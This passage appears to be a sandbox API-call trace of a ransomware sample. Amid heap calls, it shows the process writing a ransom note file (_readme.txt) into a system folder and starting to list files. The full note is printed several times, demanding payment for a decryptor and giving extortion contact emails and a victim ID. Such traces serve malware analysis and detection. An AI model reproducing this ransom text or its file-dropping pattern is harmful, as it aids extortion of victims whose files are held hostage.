(HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.989] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.991] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0127.991] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.991] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.991] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.991] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.991] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.991] PathFindFileNameW (pszPath="") returned="" [0127.991] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.991] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.992] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.992] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.992] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0127.992] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0127.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.992] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.992] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0127.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.993] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.993] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.993] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.994] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.994] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.995] CloseHandle (hObject=0x5c4) returned 1 [0127.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.995] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.996] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.996] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, 